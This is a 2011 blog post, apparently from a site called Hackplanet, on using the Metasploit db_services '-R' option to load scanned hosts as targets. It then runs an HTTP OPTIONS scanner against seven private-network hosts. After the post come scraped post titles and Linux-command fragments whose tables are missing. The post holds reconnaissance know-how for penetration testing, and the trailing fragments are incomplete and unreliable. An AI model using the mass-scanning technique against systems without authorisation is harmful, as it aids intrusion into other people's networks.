2011-05-10T19:08:00.000-07:00

So a couple of cool updates finally to metasploit framework. If you inspect "db_services", you will perhaps(:P) see a super cool and sexy feature of "-R".

msf auxiliary(http_version) > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ] [-o ]

-a   Search for a list of addresses
-c     Only show the given columns
-h,--help         Show this help information
-n   Search for a list of service names
-p   Search for a list of ports
-r      Only show [tcp|udp] services
-u,--up           Only show services which are up
-o          Send output to a file in csv format
-R,--rhosts       Set RHOSTS from the results of the search

Available columns: created_at, info, name, port, proto, state, updated_at

Till now, only listing hosts by ports (using db_services -p 80) wass possible. however if you want to use those hosts and wanna throw modules at them, "-R" options comes handy.

msf auxiliary(http_version) > use auxiliary/scanner/http/options
msf auxiliary(options) > db_services -R -p 80

Services
========

host           port proto name state info
----           ---- ----- ---- ----- ----
192.168.1.245 80    tcp    http open   Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 )
192.168.1.246 80    tcp    http open   Apache/2.2.3 (CentOS)
192.168.1.247 80    tcp    http open   Apache/2.2.12 (Ubuntu)
192.168.1.248 80    tcp    http open   lighttpd/1.5.0
192.168.1.249 80    tcp    http open   Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/2.2.11
192.168.1.251 80    tcp    http open   Apache
192.168.1.254 80    tcp    http open   Apache/2.2.3 (CentOS)

RHOSTS => file:/tmp/msf-db-rhosts-20110423-27121-10wiuni-0

msf auxiliary(options) > run

[*] Scanned 1 of 7 hosts (014% complete)
[*] Scanned 2 of 7 hosts (028% complete)
[*] 192.168.1.247 allows GET,HEAD,POST,OPTIONS methods
[*] Scanned 3 of 7 hosts (042% complete)
[*]192.168.1.248 allows OPTIONS, GET, HEAD, POST methods
[*] Scanned 4 of 7 hosts (057% complete)
[*] 192.168.1.249 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Scanned 5 of 7 hosts (071% complete)
[*] Scanned 6 of 7 hosts (085% complete)
[*] Scanned 7 of 7 hosts (100% complete)
[*] Auxiliary module execution completed

Hackplanet

Replacements for Linux Commands : Part 3

Click Here to go to Previous part : Part 2

Route

Deprecated route commands

Replacement

Replacements for Linux Commands : Part 2

So moving further with our FIRST PART , lets move onwards.

Iwconfig

Deprecated iwconfig commands

Replacement

Nameif

Deprecated nameif commands

Replacement

Netstat

Deprecated netstat commands

Replacement

Click here to go to Next part : Part 3

Replacements for Linux Commands : Part 1

Deprecated command

Replacement command(s)

Arp

Deprecated arp commands

Replacement

Ifconfig

Deprecated ifconfig commands

Replacement

Iptunnel

Deprecated iptunnel commands

Replacement

9 Suggestions which Apple gave to Samsung

BSNL's Website Hacked again

World's First Android 4.0 Launched from China Market : Ice Cream Sandwich Tablet

Google Graph Calculator : Use Google as a Graphics Calculator

How to crack SQL Server's password Hashes

Nmap Kungfu Part 1 - Basic Scanning

Scanning for Hosts

Complete list of Web and Database Ports

Check WiFi Network Performance with Qcheck to Help Improve Throughput

WEP In a Nutshell

Tool Population For Vulnerability Assessment

Getting Rid from Adwares and Spywares

Opera 11.11 Crash Vulnerabilty Discussion

Small Discussion on DNS Security

Diffrent ways to Access Command Prompt

CMS Explorer : Reveal CMS Components out of the Site

Retreive External files Via HTTP using WHS Scritps

Tools to prevent data loss

Some questions to be answered during Malware Analysis

Enable/Disable Button Scam Spreading on facebook

How to be safe on Facebook in times of spams.

1. Who can see what?

2. Place your friends in lists

3. How secure is your password?

4. Who can find you?

5. What does my profile look like to Grandpa?

6. Browse Facebook securely

7. Who is logging in as you?

8. Which apps know you?

9. Even your friends' apps know you, too

10. Who can post on your wall?

General Advice For Improving RAM performance

Running Auxiliary Modules Against Multiple Hosts in a Sexy Manner